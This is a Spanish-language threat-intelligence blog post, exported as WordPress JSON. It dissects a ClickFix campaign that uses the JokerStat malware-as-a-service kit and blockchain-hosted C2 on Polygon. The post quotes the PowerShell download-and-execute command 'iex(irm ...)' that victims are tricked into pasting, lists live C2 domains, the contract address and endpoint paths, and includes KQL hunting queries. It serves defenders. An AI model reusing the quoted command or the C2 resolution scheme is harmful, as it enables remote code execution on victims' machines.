{"id":429,"date":"2026-07-15T21:18:57","date_gmt":"2026-07-15T21:18:57","guid":{"rendered":"https:\/\/escudodigital.uy\/?p=429"},"modified":"2026-07-15T21:18:59","modified_gmt":"2026-07-15T21:18:59","slug":"clickfix-jokerstat-y-c2-en-blockchain-diseccion-de-una-operacion-pre-ransomware-como-servicio","status":"publish","type":"post","link":"https:\/\/escudodigital.uy\/index.php\/2026\/07\/15\/clickfix-jokerstat-y-c2-en-blockchain-diseccion-de-una-operacion-pre-ransomware-como-servicio\/","title":{"rendered":"ClickFix, JokerStat y C2 en blockchain: disecci\u00f3n de una operaci\u00f3n pre-ransomware como servicio"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/ciber-tec.com.co\/\" data-type=\"link\" data-id=\"https:\/\/ciber-tec.com.co\/\">CIBER-TEC<\/a>, En este art\u00edculo analizaremos una campa\u00f1a, documentada por Unit 42, que industrializa la convergencia de tres mundos que hasta hace poco operaban por separado: la ingenier\u00eda social de ClickFix (inducir a la v\u00edctima a ejecutar un comando desde su propio equipo), un kit de malware como servicio (MaaS) llamado JokerStat con paneles de operador y soporte por Telegram, y una capa de comando y control resuelta en la blockchain de Polygon mediante la t\u00e9cnica EtherHiding. La cadena termina en staging previo a ransomware: robo de credenciales de LSASS, enumeraci\u00f3n de Active Directory y auto-replicaci\u00f3n. La actividad se solapa con operaciones atribuidas a Rapid Brigantine (Vanilla Tempest).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Tesis del art\u00edculo:<\/strong>&nbsp;esta operaci\u00f3n no introduce una t\u00e9cnica in\u00e9dita; ensambla varias con l\u00f3gica de producto. La consecuencia defensiva es que las listas de bloqueo y el escaneo de archivos llegan tarde por dise\u00f1o. El control efectivo se desplaza al eslab\u00f3n humano, al egress y a la lectura del propio contrato en la cadena de bloques.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">1. El contexto y la anatom\u00eda de la cadena<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Lo relevante de esta campa\u00f1a no es ninguna t\u00e9cnica aislada, sino c\u00f3mo se ensamblan. Es un caso de estudio del modelo compartimentado que gobierna el ecosistema de ransomware actual, donde el acceso, la plataforma de entrega y la post-explotaci\u00f3n son servicios independientes que se acoplan por transacci\u00f3n.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La secuencia completa recorre seis etapas. Un usuario llega a un sitio comprometido que le muestra una falsa verificaci\u00f3n de seguridad; siguiendo las instrucciones, pega y ejecuta un comando de PowerShell que arranca toda la cadena. El payload viaja oculto en una imagen y se ejecuta en memoria sobre un proceso firmado y confiable. El malware pregunta a un contrato en la blockchain de Polygon cu\u00e1l es su servidor de mando y control vigente, se conecta, persiste y comienza a preparar el terreno para el cifrado.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">2. \u00bfQu\u00e9 es ClickFix? Mec\u00e1nica y por qu\u00e9 funciona<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">ClickFix es una t\u00e9cnica de acceso inicial que invierte la carga de la ejecuci\u00f3n: en lugar de que el atacante entregue y detone un binario, es la propia v\u00edctima quien ejecuta el c\u00f3digo malicioso en su equipo, convencida de que realiza un paso de verificaci\u00f3n leg\u00edtimo. El patr\u00f3n se populariz\u00f3 a mediados de 2024 y hoy es uno de los vectores de entrada de mayor crecimiento porque elude, de ra\u00edz, las defensas centradas en la descarga de archivos.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El mecanismo se apoya en tres piezas. Primero, un se\u00f1uelo que imita una pantalla familiar y confiable \u2014un desaf\u00edo de Cloudflare, una actualizaci\u00f3n del navegador, un error de reproducci\u00f3n de video\u2014. Segundo, la inyecci\u00f3n silenciosa en el portapapeles: mediante JavaScript, la p\u00e1gina coloca un comando en el portapapeles del usuario sin que este lo perciba. Tercero, unas instrucciones guiadas que llevan a la v\u00edctima a abrir una consola con privilegios y pegar el comando. En la campa\u00f1a analizada, el se\u00f1uelo instruye la secuencia Win+X, elegir Terminal, Ctrl+V y Enter.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">El comando del portapapeles y el polimorfismo sint\u00e1ctico<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El comando pegado sigue un patr\u00f3n reconocible: fija el protocolo de seguridad a TLS 1.2 y a continuaci\u00f3n invoca&nbsp;<code>iex(irm 'https:\/\/&lt;dominio&gt;\/dl\/p\/&lt;UUID&gt;')<\/code>, es decir, descarga la siguiente etapa del payload (el siguiente \u201cstage\u201d) desde un dominio de C2 y lo ejecuta en memoria. El detalle interesante para la ingenier\u00eda de detecci\u00f3n es que el kit no emite un \u00fanico comando, sino cinco variantes sint\u00e1cticas equivalentes: enumeraci\u00f3n expl\u00edcita del protocolo, forma num\u00e9rica abreviada (3072 equivale a TLS 1.2), banderas abreviadas (<code>-ubp<\/code>&nbsp;en lugar de&nbsp;<code>-UseBasicParsing<\/code>), sintaxis con operador de tuber\u00eda (por ejemplo,&nbsp;<code>'https:\/\/&lt;dominio&gt;\/dl\/p\/&lt;UUID&gt;' | iex<\/code>&nbsp;en lugar de&nbsp;<code>iex(irm ...)<\/code>), y uso de la cadena de texto&nbsp;<code>'Tls12'<\/code>&nbsp;en lugar del valor num\u00e9rico para fijar el protocolo. Todas producen el mismo efecto, pero cambian la huella textual para degradar las reglas basadas en firmas est\u00e1ticas. A esto se suma la rotaci\u00f3n de los dominios de C2 y el uso de rutas con identificadores UUID por v\u00edctima.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00bfPor qu\u00e9 funciona tan bien? Porque desplaza el punto de decisi\u00f3n desde la m\u00e1quina hacia la persona y desde el archivo hacia una acci\u00f3n manual. No hay descarga que un navegador pueda bloquear ni adjunto que un gateway pueda detonar en sandbox; hay un ser humano copiando texto. Adem\u00e1s, la ejecuci\u00f3n interactiva en PowerShell deja una traza forense muy concreta \u2014la clave de registro RunMRU\u2014 que, parad\u00f3jicamente, es tambi\u00e9n una de las mejores oportunidades de detecci\u00f3n.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3. El actor y la estructura de afiliados (JokerStat MaaS)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Detr\u00e1s de la campa\u00f1a no hay un actor monol\u00edtico, sino una cadena de suministro del cibercrimen. Conviene separar los roles porque cada uno se comercializa por separado y esa separaci\u00f3n es, en s\u00ed misma, un rasgo defensivamente relevante.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">La plataforma: JokerStat como kit MaaS<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El elemento articulador de esta operaci\u00f3n es JokerStat, un kit de malware como servicio. La evidencia es contundente: los quince dominios de C2 identificados sirven exactamente el mismo clon \u2014una falsa p\u00e1gina de acceso a un panel de anal\u00edtica llamado JokerStat\u2014 y ofrecen incluso un canal de soporte por Telegram (@jokerstat_support) para los operadores que adquieren el kit. El propio c\u00f3digo delata la marca: la variable de guarda que evita ejecuciones concurrentes de la captura de pantalla se llama&nbsp;<code>__jks_screen_run_<\/code>&nbsp;(jks por JokerStat).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Este es el patr\u00f3n del MaaS moderno, ya documentado en kits como Odyssey: un operador desarrolla y mantiene la plataforma \u2014los paneles, la infraestructura de resoluci\u00f3n, las p\u00e1ginas se\u00f1uelo\u2014 y la alquila a afiliados que ejecutan las campa\u00f1as. La consecuencia operativa es doble. Por un lado, homogeneiza los artefactos: el mismo clon y las mismas rutas aparecen en infraestructura distinta, lo que facilita el pivote y la caza para el defensor. Por el otro, desacopla la atribuci\u00f3n: quien despliega el se\u00f1uelo no es necesariamente quien desarrolla el kit ni quien ejecuta el ransomware final.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">La post-explotaci\u00f3n: solapamiento con Rapid Brigantine<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">La actividad posterior a la ejecuci\u00f3n refleja de cerca operaciones atribuidas a Rapid Brigantine, un actor tambi\u00e9n conocido como Vanilla Tempest, DEV-0832, Vice Society y VICE SPIDER, activo desde al menos 2022 y asociado a familias de ransomware como Rhysida, BlackCat, Zeppelin y Quantum Locker. La formulaci\u00f3n correcta es solapamiento conductual, no atribuci\u00f3n concluyente: los TTP coinciden, pero en un modelo de afiliados el mismo conjunto de t\u00e9cnicas puede ser operado por manos distintas. Mantener esa cautela anal\u00edtica es parte del rigor del informe, no una debilidad de este.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4. Blockchain en la cadena de ataque: EtherHiding sobre Polygon<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Este es el coraz\u00f3n t\u00e9cnico de la operaci\u00f3n y lo que la separa del ClickFix gen\u00e9rico. En lugar de codificar el servidor de C2 en el malware \u2014donde ser\u00eda un indicador fijo y bloqueable\u2014 el implante lo consulta en tiempo real a un contrato inteligente en la blockchain de Polygon. La t\u00e9cnica se conoce como EtherHiding.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Qu\u00e9 es EtherHiding y de d\u00f3nde viene<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">EtherHiding fue documentada por primera vez por Guardio Labs en octubre de 2023, en el marco de la campa\u00f1a ClearFake, y desde entonces la han adoptado actores cada vez m\u00e1s capaces, incluido un cl\u00faster norcoreano descrito por Google (Mandiant\/GTIG) en octubre de 2025. La idea es tomar prestado un concepto del espionaje cl\u00e1sico \u2014el resolutor de punto muerto o dead-drop resolver\u2014 y llevarlo a la cadena de bloques: en vez de conectarse directamente al C2, el malware primero consulta una fuente p\u00fablica y leg\u00edtima para averiguar cu\u00e1l es el C2 vigente. Cuando esa fuente es un contrato inteligente, hereda todas las propiedades de la blockchain: es inmutable, est\u00e1 replicada globalmente y cualquiera puede leerla, incluido el malware.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C\u00f3mo funciona en esta campa\u00f1a, paso a paso<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El c\u00f3digo de resoluci\u00f3n implementa una funci\u00f3n&nbsp;<code>getServers()<\/code>&nbsp;que itera una lista de ocho endpoints RPC p\u00fablicos de Polygon \u2014drpc.org, publicnode, 1rpc.io, QuickNode, OnFinality, Pocket Network, entre otros\u2014 y contra cada uno emite una llamada&nbsp;<code>eth_call<\/code>. Esa llamada invoca el m\u00e9todo identificado por el selector&nbsp;<code>0x3bc5de30<\/code>&nbsp;sobre el contrato&nbsp;<code>0xf5966808a9ECbdb8794F568922809C52b0Fd2446<\/code>. El contrato devuelve, codificada en su estado, la lista de dominios de C2 activos.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tres decisiones de dise\u00f1o merecen atenci\u00f3n. La redundancia de endpoints \u2014ocho RPC distintos\u2014 garantiza que bloquear uno o dos proveedores no interrumpa la resoluci\u00f3n. El uso de&nbsp;<code>eth_call<\/code>, que es una llamada de solo lectura, significa que no se consume gas ni se genera una transacci\u00f3n: la consulta es gratuita, no deja rastro en el historial de transacciones del contrato y, sobre el cable, es indistinguible de la interacci\u00f3n de cualquier aplicaci\u00f3n descentralizada leg\u00edtima. Y la rotaci\u00f3n se vuelve trivial para el atacante: con una sola transacci\u00f3n que reescribe el estado del contrato, cambia el C2 de toda la botnet simult\u00e1neamente.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Por qu\u00e9 importa: resiliencia frente a auditabilidad<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El C2 on-chain invierte una premisa b\u00e1sica de los takedowns. El comando y control tradicional tiene un centro incautable \u2014un dominio, una IP, un servidor\u2014. Aqu\u00ed no lo hay: el punto de resoluci\u00f3n vive en un contrato inmutable que no admite sinkholing ni puede darse de baja. Para el defensor, esto significa que perseguir los dominios resueltos es una carrera perdida, porque son ef\u00edmeros y se reemplazan con una transacci\u00f3n.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Este patr\u00f3n no es te\u00f3rico ni marginal. En abril de 2026, The DFIR Report document\u00f3 una intrusi\u00f3n en la que un malware que resolv\u00eda su C2 desde contratos \u2014EtherRAT\u2014 deriv\u00f3, a trav\u00e9s de un framework de C2, en el despliegue del ransomware The Gentlemen. La clase de infraestructura que aqu\u00ed se analiza es la misma que termina en cifrado a escala empresarial.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>El arma de doble filo.<\/strong>&nbsp;La misma inmutabilidad que protege al atacante lo expone. El estado del contrato es p\u00fablico, permanente y con marca de tiempo. Leer el historial de escrituras del contrato enumera todos los dominios de C2 que han estado activos y revela el ritmo de operaci\u00f3n del actor. La lectura correcta es contraintuitiva: el dominio resuelto es el indicador m\u00e1s d\u00e9bil y la direcci\u00f3n del contrato es el indicador m\u00e1s fuerte y perdurable. Ese es el pivote de detecci\u00f3n y atribuci\u00f3n que el atacante no puede borrar.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">5. T\u00e9cnicas de evasi\u00f3n<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">M\u00e1s all\u00e1 del C2 en blockchain, la operaci\u00f3n acumula varias capas de evasi\u00f3n que conviene entender por separado, porque cada una anula una familia distinta de controles.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Esteganograf\u00eda en PNG y ejecuci\u00f3n en memoria con Donut<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El payload no viaja en claro: se oculta dentro de los datos de p\u00edxel de una imagen PNG. Un loader .NET reconstruye desde esos p\u00edxeles un shellcode empaquetado con Donut \u2014un framework leg\u00edtimo de red team que convierte ejecutables .NET o PE en shellcode de posici\u00f3n independiente\u2014 y lo ejecuta directamente en memoria. En disco solo queda una imagen estad\u00edsticamente normal, lo que anula el escaneo est\u00e1tico de archivos.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">DLL sideloading sobre binario firmado<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El proceso que ejecuta el shellcode es un binario de Microsoft leg\u00edtimamente firmado, al que se le hace cargar una DLL maliciosa por sideloading. El resultado es que la actividad hereda la reputaci\u00f3n del binario firmado: la telemetr\u00eda deja de decir \u201cbinario desconocido\u201d y pasa a decir \u201ccarga de m\u00f3dulo en un proceso confiable\u201d, un evento mucho m\u00e1s dif\u00edcil de priorizar para un EDR basado en reputaci\u00f3n.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exfiltraci\u00f3n de pantalla y reinyecci\u00f3n din\u00e1mica del portapapeles<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El kit incluye dos capacidades adicionales. La primera es la exfiltraci\u00f3n de capturas de pantalla: usando html2canvas, el implante renderiza la p\u00e1gina visible, la serializa como JPEG en base64 y la env\u00eda por POST al endpoint&nbsp;<code>\/collect\/screen<\/code>&nbsp;del C2, repiti\u00e9ndolo cada 120 segundos. La segunda es la inyecci\u00f3n din\u00e1mica del portapapeles: el implante consulta el endpoint&nbsp;<code>\/cload<\/code>&nbsp;\u2014parametrizado con un identificador, el sistema operativo y el hostname de la v\u00edctima\u2014 y ejecuta como script el contenido devuelto, que a su vez reescribe el portapapeles. Esto permite al operador cambiar el comando ClickFix servido a cada v\u00edctima sin tocar la p\u00e1gina, de forma segmentada y en caliente.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Polimorfismo, rotaci\u00f3n y persistencia resistente al aislamiento<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">A las anteriores se suman el polimorfismo sint\u00e1ctico del payload (las cinco variantes ya descritas), la rotaci\u00f3n de quince dominios de C2 registrados con poca antelaci\u00f3n, y un rasgo especialmente inc\u00f3modo para la respuesta a incidentes: en al menos un caso documentado, la persistencia sigui\u00f3 relanz\u00e1ndose durante horas despu\u00e9s de aislar el host en red. El aislamiento del EDR no cort\u00f3 el mecanismo de relanzamiento local, lo que obliga a tratar el aislamiento como contenci\u00f3n temporal y no como erradicaci\u00f3n.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">6. Post-explotaci\u00f3n y staging pre-ransomware<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">La fase final es un manual de preparaci\u00f3n de impacto. Se observa volcado de credenciales desde el proceso LSASS, enumeraci\u00f3n por LDAP de administradores de dominio y de equipos, y auto-replicaci\u00f3n del c\u00f3digo en directorios con nombres aleatorizados. Ese tr\u00edo \u2014robo de credenciales, mapeo de Active Directory y propagaci\u00f3n\u2014 no corresponde a un infostealer que exfiltra y se marcha, sino al reconocimiento de dominio con intenci\u00f3n de movimiento lateral y despliegue masivo de cifrado. Es, en t\u00e9rminos pr\u00e1cticos, la antesala del ransomware, y es tambi\u00e9n la \u00faltima ventana de detecci\u00f3n limpia antes del cifrado.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">7. Indicadores de compromiso (IoC)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Los siguientes indicadores provienen de la investigaci\u00f3n de Unit 42 y de la evidencia analizada. Deben verificarse contra su vigencia antes de operacionalizarlos, dada la rotaci\u00f3n descrita; el indicador m\u00e1s perdurable no es ning\u00fan dominio, sino la direcci\u00f3n del contrato.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th class=\"has-text-align-left\" data-align=\"left\">Tipo<\/th><th class=\"has-text-align-left\" data-align=\"left\">Indicador \/ valor<\/th><\/tr><\/thead><tbody><tr><td>Contrato C2 (Polygon)<\/td><td><code>0xf5966808a9ECbdb8794F568922809C52b0Fd2446<\/code><\/td><\/tr><tr><td>Selector de m\u00e9todo<\/td><td><code>0x3bc5de30<\/code>&nbsp;(invocado v\u00eda&nbsp;<code>eth_call<\/code>)<\/td><\/tr><tr><td>Dominios de C2<\/td><td>morganstat.sbs \u00b7 massstat.co \u00b7 stroinnetsata.biz \u00b7 xverikstat.us \u00b7 okliimnwq.co (parte de ~15)<\/td><\/tr><tr><td>Rutas \/ endpoints<\/td><td><code>\/dl\/p\/&lt;UUID&gt;<\/code>&nbsp;\u00b7&nbsp;<code>\/collect\/screen<\/code>&nbsp;\u00b7&nbsp;<code>\/cload?k=&amp;os=&amp;h=<\/code><\/td><\/tr><tr><td>Artefacto de host<\/td><td><code>__jks_screen_run_<\/code>&nbsp;(variable de guarda; marca del kit JokerStat)<\/td><\/tr><tr><td>Soporte del kit<\/td><td>Telegram @jokerstat_support<\/td><\/tr><tr><td>Payload PowerShell<\/td><td><code>iex(irm 'https:\/\/&lt;dominio&gt;\/dl\/p\/&lt;UUID&gt;' -UseBasicParsing)<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">8. Mapeo a MITRE ATT&amp;CK<\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th class=\"has-text-align-left\" data-align=\"left\">T\u00e1ctica<\/th><th class=\"has-text-align-left\" data-align=\"left\">T\u00e9cnica<\/th><th class=\"has-text-align-left\" data-align=\"left\">Aplicaci\u00f3n<\/th><\/tr><\/thead><tbody><tr><td>Initial Access<\/td><td>T1189 Drive-by Compromise<\/td><td>Falsa actualizaci\u00f3n SocGholish en WordPress comprometido<\/td><\/tr><tr><td>Execution<\/td><td>T1204.004 \u00b7 T1059.001<\/td><td>ClickFix \u2192 PowerShell ejecutado por la v\u00edctima<\/td><\/tr><tr><td>Defense Evasion<\/td><td>T1027.003 Steganography<\/td><td>Shellcode Donut oculto en p\u00edxeles de un PNG<\/td><\/tr><tr><td>Defense Evasion<\/td><td>T1574.002 DLL Side-Loading<\/td><td>Binario Microsoft firmado carga una DLL maliciosa<\/td><\/tr><tr><td>Defense Evasion<\/td><td>T1055 Process Injection<\/td><td>Ejecuci\u00f3n del shellcode en memoria<\/td><\/tr><tr><td>Command &amp; Control<\/td><td>T1102 \u00b7 T1568 (EtherHiding)<\/td><td>Contrato en Polygon como dead-drop resolver + dominios rotatorios<\/td><\/tr><tr><td>Collection<\/td><td>T1113 Screen Capture<\/td><td>Exfiltraci\u00f3n de pantalla con html2canvas cada 120 s<\/td><\/tr><tr><td>Collection \/ Exec<\/td><td>T1115 Clipboard Data<\/td><td>Inyecci\u00f3n y reescritura din\u00e1mica del portapapeles<\/td><\/tr><tr><td>Credential Access<\/td><td>T1003.001 LSASS Memory<\/td><td>Volcado de credenciales del proceso LSASS<\/td><\/tr><tr><td>Discovery<\/td><td>T1018 \u00b7 T1069 (LDAP)<\/td><td>Enumeraci\u00f3n de administradores de dominio y equipos<\/td><\/tr><tr><td>Impact (staging)<\/td><td>T1486 (preparaci\u00f3n)<\/td><td>Auto-replicaci\u00f3n y preparaci\u00f3n del cifrado<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">9. Recomendaciones de protecci\u00f3n<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Las contramedidas se ordenan por dominio de control y por su resistencia frente a la evasi\u00f3n espec\u00edfica de esta cadena. El criterio rector es concreto: cada medida ataca un eslab\u00f3n identificado y se explica por qu\u00e9 funciona, evitando la recomendaci\u00f3n gen\u00e9rica.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C1 \u2014 Cortar el eslab\u00f3n humano en el endpoint<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Es la medida de mayor impacto y menor fricci\u00f3n, porque toda la cadena depende de que un usuario ejecute PowerShell interactivo. Restringir o auditar el di\u00e1logo Ejecutar y el acceso a la Terminal para cuentas est\u00e1ndar mediante GPO; desplegar reglas ASR de Microsoft Defender que bloqueen la creaci\u00f3n de procesos hijos desde el navegador y la ejecuci\u00f3n de contenido ofuscado; y habilitar el registro de PowerShell (ScriptBlock y Module Logging) junto con Constrained Language Mode. Si la ejecuci\u00f3n interactiva est\u00e1 gobernada por pol\u00edtica, la cadena se rompe en su primer eslab\u00f3n.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C2 \u2014 Gobernar el egress y vigilar la resoluci\u00f3n en blockchain<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">La lecci\u00f3n de EtherHiding es que bloquear dominios es insuficiente por dise\u00f1o. La contramedida realista tiene dos frentes. En el egress: proxy con inspecci\u00f3n y bloqueo de tr\u00e1fico RPC\/Web3 no autorizado hacia nodos de blockchain (Polygon, BSC, Ethereum) desde procesos que no son navegadores ni carteras leg\u00edtimas; y filtrado de dominios de registro muy reciente (NRD). En inteligencia on-chain: incorporar la direcci\u00f3n del contrato como indicador de vigilancia y leer peri\u00f3dicamente su historial de estado para enumerar los C2 vigentes e hist\u00f3ricos, convirtiendo la inmutabilidad del atacante en telemetr\u00eda propia.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C3 \u2014 Endurecer el endpoint contra la evasi\u00f3n en memoria<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Frente a la ejecuci\u00f3n en memoria y al sideloading sobre binarios firmados, la firma de fichero deja de bastar: el EDR debe apoyarse en protecci\u00f3n conductual y detecci\u00f3n de inyecci\u00f3n en memoria, no solo en reputaci\u00f3n. Para el robo de credenciales, activar la protecci\u00f3n de LSASS (RunAsPPL \/ LSA Protection), Credential Guard donde el hardware lo permita, y la regla ASR que bloquea el volcado de credenciales desde LSASS.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C4 \u2014 Redefinir la contenci\u00f3n en respuesta a incidentes<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Dado que la persistencia sobrevivi\u00f3 al aislamiento, la contenci\u00f3n de red debe acompa\u00f1arse de una erradicaci\u00f3n local verificada: enumeraci\u00f3n de tareas programadas, claves Run\/RunOnce, servicios y watchdogs antes de declarar contenido el host. Se asume persistencia redundante y se trata el aislamiento como medida temporal, no como estado final del incidente.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C5 \u2014 Cazar la actividad post-explotaci\u00f3n como red de seguridad<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Si la evasi\u00f3n temprana tuvo \u00e9xito, la fase de reconocimiento de dominio es la \u00faltima oportunidad limpia antes del cifrado. Monitorear accesos an\u00f3malos a&nbsp;<code>lsass.exe<\/code>, r\u00e1fagas de consultas LDAP enumerando grupos privilegiados y objetos de tipo equipo, y creaci\u00f3n de archivos replicados en directorios aleatorizados. Son se\u00f1ales que la esteganograf\u00eda y el C2 en blockchain no pueden ocultar.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">10. Detecci\u00f3n e ingenier\u00eda de cacer\u00eda<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">La detecci\u00f3n de mayor valor es la del acto ClickFix en s\u00ed, porque es el eslab\u00f3n que la v\u00edctima no puede ocultar. Windows registra los comandos ejecutados desde el di\u00e1logo Ejecutar en la clave RunMRU, lo que permite parsear entradas en busca de uso sospechoso. Las siguientes consultas son puntos de partida \u2014no reglas de producci\u00f3n\u2014 para orientar la cacer\u00eda.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>KQL \u00b7 Cadena parental an\u00f3mala (Defender \/ Sentinel)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ PowerShell \/ mshta \/ rundll32 lanzados por el navegador o Explorer\nDeviceProcessEvents\n| where InitiatingProcessFileName in~ (\"explorer.exe\",\"chrome.exe\",\"msedge.exe\")\n| where FileName in~ (\"powershell.exe\",\"mshta.exe\",\"rundll32.exe\")\n| where ProcessCommandLine has_any (\"irm\",\"iex\",\"-enc\",\"-ubp\",\"UseBasicParsing\",\"3072\")\n| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>KQL \u00b7 Egress hacia RPC de blockchain desde procesos no-navegador<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ Conexiones a nodos RPC (Polygon\/BSC\/Ethereum) fuera de navegadores y wallets\nDeviceNetworkEvents\n| where RemoteUrl has_any (\"drpc.org\",\"publicnode.com\",\"1rpc.io\",\"quiknode.pro\",\n        \"onfinality.io\",\"pocket.network\",\"rpc.polygon\")\n| where InitiatingProcessFileName !in~ (\"chrome.exe\",\"msedge.exe\",\"firefox.exe\")\n| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>KQL \u00b7 Acceso sospechoso a LSASS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>DeviceEvents\n| where ActionType == \"OpenProcessApiCall\"\n| where FileName =~ \"lsass.exe\"\n| where InitiatingProcessFileName !in~ (\"MsMpEng.exe\",\"wmiprvse.exe\")\n| summarize count() by DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Como complemento, tres se\u00f1ales de alto rendimiento cierran el espectro: binarios firmados de Microsoft que cargan DLLs desde rutas de usuario no est\u00e1ndar (%APPDATA%, %TEMP%, directorios aleatorizados); tr\u00e1fico saliente peri\u00f3dico y regular hacia el endpoint&nbsp;<code>\/collect\/screen<\/code>&nbsp;o patrones POST con cuerpos JPEG en base64; y el monitoreo directo, en un explorador de bloques, de la direcci\u00f3n del contrato para alertar sobre cada nueva escritura de estado \u2014es decir, sobre cada rotaci\u00f3n de C2 en el momento en que ocurre.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">11. Conclusi\u00f3n<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Esta operaci\u00f3n no destaca por inventar, sino por integrar con criterio de producto. Ensambla ingenier\u00eda social de portapapeles, un kit MaaS con paneles y soporte, evasi\u00f3n en memoria y un C2 en blockchain, y lo orquesta hacia un \u00fanico fin: el cifrado. Su significado para la postura de riesgo institucional es que consolida un patr\u00f3n donde la entrega es barata y comoditizada, la evasi\u00f3n es de grado ofensivo y la infraestructura de control resiste los takedowns. Una defensa organizada por firmas y listas de bloqueo llega, estructuralmente, tarde.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La respuesta correcta no es acumular herramientas, sino reordenar los controles alrededor de tres verdades que esta cadena deja expuestas. El eslab\u00f3n m\u00e1s fr\u00e1gil del atacante es la ejecuci\u00f3n humana del comando, y ah\u00ed conviene concentrar la fricci\u00f3n. La resoluci\u00f3n del C2 vive fuera de la infraestructura incautable, de modo que el egress y la lectura del propio contrato se convierten en el punto de control real. Y la contenci\u00f3n por aislamiento es una ilusi\u00f3n si no se acompa\u00f1a de erradicaci\u00f3n local verificada. El defensor que internalice esas tres ideas no necesita anticipar cada variante futura: le basta con cerrar las condiciones que todas comparten. La misma inmutabilidad que hace invencible el C2 del atacante es, le\u00edda al rev\u00e9s, el registro p\u00fablico que lo delata.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Fuentes y referencias<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Unit 42, Palo Alto Networks \u2014\u00a0<em>ClickFix campaign utilizing MaaS kit with Blockchain C2<\/em>\u00a0(Timely Threat Intelligence, 2026-07-02).<\/li>\n\n\n\n<li>Unit 42, Palo Alto Networks \u2014\u00a0<em>Fix the Click: Preventing the ClickFix Attack Vector<\/em>.<\/li>\n\n\n\n<li>Unit 42, Palo Alto Networks \u2014\u00a0<em>The ClickFix Factory: First Exposure of IUAM ClickFix Generator<\/em>\u00a0(modelo MaaS\/afiliados; Odyssey).<\/li>\n\n\n\n<li>Unit 42, Palo Alto Networks \u2014\u00a0<em>2026 Global Incident Response Report<\/em>\u00a0(ClickFix, ejecuci\u00f3n en memoria, cadena hacia ransomware).<\/li>\n\n\n\n<li>Guardio Labs \u2014\u00a0<em>EtherHiding: Hiding Web2 Malicious Code in Web3 Smart Contracts<\/em>\u00a0(divulgaci\u00f3n original, 2023).<\/li>\n\n\n\n<li>Google Threat Intelligence Group \/ Mandiant \u2014\u00a0<em>DPRK Adopts 